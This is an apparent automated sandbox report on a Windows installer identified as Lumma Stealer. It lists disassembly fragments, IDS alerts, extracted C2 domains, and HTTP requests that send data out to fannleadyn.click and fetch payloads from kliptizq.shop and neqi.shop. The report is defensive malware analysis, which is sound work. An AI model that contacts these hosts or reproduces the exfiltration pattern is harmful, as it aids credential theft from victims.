              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_03223A66
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-0EAF77CFh]0_2_0322CADF
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov edx, ecx0_2_0323E936
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 71B3F069h0_2_0323E936
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx+60h]0_2_0320C93C
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+24h]0_2_032299A9
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ecx, eax0_2_0323A9B6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-29h]0_2_0320A9D6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 5D0AA591h0_2_0323CF30
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0Eh]0_2_03228F6C
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp al, 2Eh0_2_03226F85
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_0320DFF2
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_0320DFF2
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-4B2E9DB5h]0_2_03228EA6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh0_2_03215EC6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ecx, edx0_2_0323EED6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_03218ED8
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ecx, eax0_2_03226D06
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_0323EDC6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ecx, eax0_2_0320ADC6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebp+458F1EF1h]0_2_0320ADC6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+28h]0_2_03208C56
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_03208C56
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ebx, edx0_2_03237CA6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], C7235EAFh0_2_0323ECA6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+042DD56Dh]0_2_0323CCE9

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 104.21.63.229:443
              Source: Malware configuration extractorURLs: crosshuaht.lat
              Source: Malware configuration extractorURLs: necklacebudi.lat
              Source: Malware configuration extractorURLs: aspecteirs.lat
              Source: Malware configuration extractorURLs: grannyejh.lat
              Source: Malware configuration extractorURLs: sustainskelet.lat
              Source: Malware configuration extractorURLs: energyaffai.lat
              Source: Malware configuration extractorURLs: fannleadyn.click
              Source: Malware configuration extractorURLs: rapeflowwj.lat
              Source: Malware configuration extractorURLs: discokeyus.lat
              Source: Joe Sandbox ViewIP Address: 194.58.112.174 194.58.112.174
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 194.58.112.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.84.113:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.63.229:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.63.229:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fannleadyn.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: fannleadyn.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JOXNEUD6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18102Host: fannleadyn.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YS0G6TE8AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8729Host: fannleadyn.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XKLNRRWZBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20388Host: fannleadyn.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZA887B5551User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7087Host: fannleadyn.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OFJH7NIYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1218Host: fannleadyn.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JZQ0PHSKJH649G7IQS3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 589758Host: fannleadyn.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: fannleadyn.click
              Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
              Source: global trafficDNS traffic detected: DNS query: fannleadyn.click
              Source: global trafficDNS traffic detected: DNS query: neqi.shop
              Source: global trafficDNS traffic detected: DNS query: kliptizq.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fannleadyn.click
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Dec 2024 22:30:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciOJcKc1CufkB1dLLXzpE4QuZtrOWCP2oBhHllYLCvwB8TZJAeZJsDpWXlGpejCJCj0PokzJOCiz14qRai0K%2B%2BSD1jmspZVSAQ466Ysmj5YYU8i3f5RQ8LB8ubN%2BVUCb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f638f1188e30f7d-EWR
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: powershell.exe, 00000004.00000002.2180106835.0000000005431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Full_Ver_Setup.exeString found in binary or memory: http://www.innosetup.com/
              Source: Full_Ver_Setup.exeString found in binary or memory: http://www.remobjects.com/ps
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000004.00000002.2180106835.0000000005431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click/
              Source: Full_Ver_Setup.exe, 00000000.00000003.1992514646.000000000082A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click/1X
              Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click/Y
              Source: Full_Ver_Setup.exe, 00000000.00000003.2012326508.0000000000861000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1922088795.000000000085E000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1946447013.0000000000861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click/api
              Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click/api2
              Source: Full_Ver_Setup.exe, 00000000.00000003.2012801885.0000000000862000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012326508.0000000000861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click/apiDZ
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click/apiF9
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1992272379.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click/apiv
              Source: Full_Ver_Setup.exe, 00000000.00000003.1946447013.000000000082A000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click/r
              Source: Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1922392393.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012249509.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1946447013.0000000000834000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1992514646.0000000000832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click/s
              Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click/x
              Source: Full_Ver_Setup.exe, 00000000.00000003.1900728110.0000000003F0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click:443/api((
              Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012249509.0000000000832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click:443/api_PROFILE_STRING=Internet
              Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fannleadyn.click:443/apiell
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtf1
              Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop:443/int_clp_ldr_sha.txtn
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/Y
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txtY)
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txtc
              Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop:443/sdgjyut/psh.txt
              Source: Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Full_Ver_Setup.exe, 00000000.00000003.1875194044.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Full_Ver_Setup.exe, 00000000.00000003.1875527710.0000000003F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: powershell.exe, 00000004.00000002.2180106835.0000000005735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
              Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landinghZ
              Source: powershell.exe, 00000004.00000002.2178588154.000000000344F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178588154.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2180079470.00000000050E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2179797544.0000000003760000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2184472007.0000000007B59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank
              Source: powershell.exe, 00000004.00000002.2178588154.0000000003476000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingmancet
              Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phish
              Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishhZ
              Source: powershell.exe, 00000004.00000002.2180106835.00000000057D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-atX)
              Source: powershell.exe, 00000004.00000002.2180106835.0000000005735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
              Source: powershell.exe, 00000004.00000002.2178588154.000000000344F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178588154.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2180079470.00000000050E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2179797544.0000000003760000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2184472007.0000000007B59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Full_Ver_Setup.exe, 00000000.00000003.1923524083.000000000422A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49731 version: TLS 1.2
